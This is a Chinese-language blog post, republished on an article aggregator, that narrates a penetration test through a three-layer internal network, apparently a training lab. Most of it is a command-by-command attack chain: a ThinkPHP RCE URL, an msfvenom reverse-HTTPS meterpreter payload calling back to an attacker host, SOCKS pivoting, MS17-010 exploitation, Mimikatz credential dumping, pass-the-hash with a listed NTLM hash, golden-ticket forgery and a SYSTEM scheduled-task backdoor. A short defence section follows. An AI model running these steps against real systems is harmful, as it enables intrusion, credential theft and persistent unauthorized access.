当前位置：首页 > article >正文

Windows服务器渗透日记：我是如何用MS17-010漏洞连穿三层内网的

article 2026/4/13 12:45:54

Windows服务器渗透实战从外网突破到内网横向移动的技术解析那天下午阳光透过百叶窗在键盘上投下斑驳的光影。我盯着屏幕上跳动的命令行界面手指在键盘上快速敲击——这不是什么电影场景而是一次真实的渗透测试任务。作为安全工程师我经常需要模拟攻击者的视角来发现企业网络中的薄弱环节。这次的目标是一个典型的三层内网架构从外网Web服务器到核心业务系统层层隔离。让我带你走进这次渗透测试的技术细节看看如何利用经典漏洞突破层层防线。1. 初始信息收集与漏洞发现任何成功的渗透都始于细致的信息收集。我首先对目标网络进行了基础扫描使用Nmap快速识别存活主机和开放服务。经典的-sS参数SYN扫描能在不建立完整TCP连接的情况下获取准确的端口信息sudo nmap -sS 192.168.10.0/24 -Pn -T4扫描结果显示了两个有趣的IP192.168.10.10运行Windows Server 2012和易优CMS192.168.10.233未明确服务信息Web应用测试往往是最佳突破口。对192.168.10.10的目录扫描发现了ThinkPHP框架的痕迹gobuster dir -u http://192.168.10.10/ -w /usr/share/wordlists/dirb/common.txt -x php更深入的工具扫描揭示了关键信息工具发现内容风险等级fscanThinkPHP RCE漏洞高危nmap -sVWindows Server 2012中危nikto过期的中间件版本中危ThinkPHP的历史RCE漏洞让我很快获得了初始立足点。通过简单的命令执行我验证了漏洞的有效性http://192.168.10.10/index.php?s/index/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]whoami提示真实环境中这种直接命令执行会触发安全警报。成熟的渗透者会使用更隐蔽的内存加载技术。2. 建立持久化访问与内网探测获得初始访问后我立即着手建立更稳定的控制通道。蚁剑AntSword这类Webshell管理工具虽然方便但流量特征明显。我更倾向于使用MSF生成的定制化后门msfvenom -p windows/x64/meterpreter/reverse_https LHOSTattacker_ip LPORT443 -f exe -o update.exe这个payload有几个关键优势使用HTTPS协议混淆流量支持多阶段传输规避基础检测可配置各种反沙箱和反分析技术成功上传并执行后meterpreter会话建立。此时需要立即进行几个关键操作进程迁移从临时的Web进程迁移到稳定系统进程migrate -N svchost.exe权限提升检查并利用本地提权漏洞getsystem信息收集run post/windows/gather/enum_domain内网探测发现了更复杂的网络结构当前网段192.168.10.0/24二级内网192.168.20.0/24通过ARP表发现域环境cyberstrikelab.com3. 横向移动突破网络隔离真正的挑战现在才开始。第二层网络(192.168.20.0/24)与第一层严格隔离。传统端口转发在这里行不通我们需要更巧妙的跳板技术。MSF的路由配置是关键run autoroute -s 192.168.20.0/24 background use auxiliary/server/socks_proxy set SRVPORT 9050 run这样设置后所有工具都可以通过本地的SOCKS代理访问二级内网。例如使用Proxychains运行Nmapproxychains nmap -sT -Pn 192.168.20.30扫描结果显示192.168.20.30存在MS17-010永恒之蓝漏洞。这个2017年爆出的SMB协议漏洞至今仍能在许多未更新的内网系统中见到。利用MS17-010的注意事项选择正确的攻击模块use exploit/windows/smb/ms17_010_psexec设置目标架构x64/x86set target 2处理不稳定的会话set AutoRunScript post/windows/manage/migrate成功利用后我们获得了192.168.20.30的SYSTEM权限。此时发现网络中还存在192.168.20.20——很可能是域控制器。4. 域环境渗透与权限维持在企业内网中域控制器是皇冠上的明珠。通过前期的信息收集我们已经确认域名cyberstrikelab.com域管理员Administrator获取的Hash94bd5248e87cb7f2f9b871d40c903927Pass-the-Hash攻击流程使用MSF获取内存中的凭据load kiwi creds_all通过代理使用psexec.py进行横向移动proxychains python3 psexec.py -hashes :94bd5248e87cb7f2f9b871d40c903927 administrator192.168.20.20获取域控权限后导出所有用户Hashrun post/windows/gather/hashdump权限维持的几种技术黄金票据伪造TGT票据golden_ticket_create -u Administrator -d cyberstrikelab.com -s S-1-5-21-... -k 5bc02b7670084dd30471730cc0a1672c计划任务设置定期回调schtasks /create /tn Update /tr C:\update.exe /sc hourly /ru SYSTEMWMI事件订阅更隐蔽的后门$filterArgs {...} $consumerArgs {...}5. 防御建议与检测方法站在防守方角度这类攻击并非无法防范。以下是针对每个攻击阶段的防护措施攻击阶段防御措施检测方法初始入侵Web应用防火墙(WAF)及时修补框架漏洞异常命令执行日志Webshell文件哈希变化横向移动网络分段禁用过时协议(SMBv1)异常SMB连接Pass-the-Hash行为特征权限提升最小权限原则本地管理员密码解决方案(LAPS)异常账户权限变更权限维持定期重置KRBTGT密码监控计划任务创建黄金票据使用特征异常WMI事件订阅企业内网安全加固清单定期进行漏洞扫描与补丁管理实施严格的网络分段策略启用Windows Defender ATP等高级威胁防护监控异常身份验证行为定期进行红蓝对抗演练在真实渗透测试项目中每个步骤都需要谨慎操作并详细记录。与恶意攻击者不同我们的目标是帮助企业构建更安全的网络环境。通过重现攻击路径客户能够直观理解风险所在进而采取针对性的防护措施。

Windows服务器渗透日记：我是如何用MS17-010漏洞连穿三层内网的

相关文章：

Windows服务器渗透日记：我是如何用MS17-010漏洞连穿三层内网的

IPTVnator：一站式开源跨平台IPTV播放器解决方案

终极GTA5模组菜单YimMenu：5分钟快速安装与完整功能指南

如何用FSVLM模型提升农田遥感分割精度？5个实战技巧分享

DeepSeek 崩了 13 小时，不是故障，是 V4 在换引擎

Vue3后台管理系统开发终极指南：vue-admin-box 全面解析

创新视角：OpCore Simplify如何重新定义Hackintosh系统定制

2026届毕业生推荐的十大降重复率工具推荐

建立班级相册？超简单，保姆级教你在PPT里建立班级“小红书”，3步打造有温度的班级小世界！

ALOS DSM: Global 全球数字地表模型 (DSM) 数据集30m v4.1

告别JPEG文件读取烦恼：从Premature end of JPEG file到cv2.imread的实战修复指南

[精品]基于微信小程序的校园二手书籍交易平台的设计与实现 UniApp

AI赋能传统行业：Lingbot深度估计在工业质检中的落地案例

写段代码教会你什么是HOOK技术？HOOK技术能干什么？荡

Baiduwp-PHP：3分钟搭建百度网盘高速下载解析服务

越用越强不是广告语：拆解 Hermes Agent 的三层学习机制

CANKing隐藏功能大揭秘：用Traffic Generator做压力测试的5个实战技巧

3分钟搞定！WinCDEmu免费虚拟光驱终极指南：告别实体光盘的时代

SolidWorks2020多版本共存攻略：如何在同一台电脑上安装多个版本

Agent之HarnessEngineering：从“先别用聊天机器人写代码”到“持续让 agent 在后台运行”：一位软件工程师的 AI 采用之路、任务拆分与自我复现实践、下班时段代理任务、外包高确

RevokeMsgPatcher防撤回工具：5个简单步骤解决微信3.9.10.19版本兼容性问题

15分钟搞定黑苹果：OpCore Simplify三步自动化配置指南

从 MVVMLight 到 CommunityToolkit.Mvvm：MVVM 框架的现代化演进与全面对比

Aeneas终极指南：3步搞定音频文本自动对齐，准确率超95% [特殊字符]

测试数据管理：AI解决方案大比拼

Python的complex方法支持复数的实部虚部访问与运算重载

终极魔兽世界字体解决方案：智能合并与字符集补全工具

达梦数据库归档日志配置与优化实战指南

[特殊字符]1 概述无线可充电传感器网络（WRSN）中公交网络辅助的无人机调度研究摘要：无线可充电传感器网络（WRSN）被广泛应用于环境和交通监测、视频监控和医疗护理等领域，有助于提高城市生活质

ESP32驱动GC9A01圆形屏：从图片数据到240x240全屏显示的实战解析